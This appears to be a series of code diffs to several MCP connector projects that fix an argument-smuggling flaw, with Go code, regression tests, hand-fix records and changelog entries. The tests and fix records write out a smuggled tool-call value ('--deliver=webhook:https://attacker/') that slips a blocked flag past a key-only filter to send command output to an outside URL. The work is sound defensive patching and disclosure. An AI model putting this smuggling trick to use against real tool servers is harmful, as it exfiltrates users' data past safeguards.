-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/pagerduty/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/pagerduty/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/pagerduty/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/pagerduty/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/pagerduty/handfixes.json
+++ b/skills/pagerduty/handfixes.json
@@ -180,6 +180,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/pagerduty/handfixes.json
+++ b/skills/pagerduty/handfixes.json
@@ -195,8 +195,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -206,7 +218,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/pandadoc/CHANGELOG.md
+++ b/skills/pandadoc/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/pandadoc/CHANGELOG.md
+++ b/skills/pandadoc/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/pandadoc/CHANGELOG.md
+++ b/skills/pandadoc/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/pandadoc/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/pandadoc/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/pandadoc/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/pandadoc/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/pandadoc/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/pandadoc/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/pandadoc/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/pandadoc/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/pandadoc/handfixes.json
+++ b/skills/pandadoc/handfixes.json
@@ -163,6 +163,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/pandadoc/handfixes.json
+++ b/skills/pandadoc/handfixes.json
@@ -178,8 +178,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -189,7 +201,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/pax8/CHANGELOG.md
+++ b/skills/pax8/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01

--- a/skills/pax8/CHANGELOG.md
+++ b/skills/pax8/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-09-01
 
 ### Added

--- a/skills/pax8/CHANGELOG.md
+++ b/skills/pax8/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01
 

--- a/skills/pax8/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/pax8/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/pax8/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/pax8/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/pax8/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/pax8/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/pax8/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/pax8/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
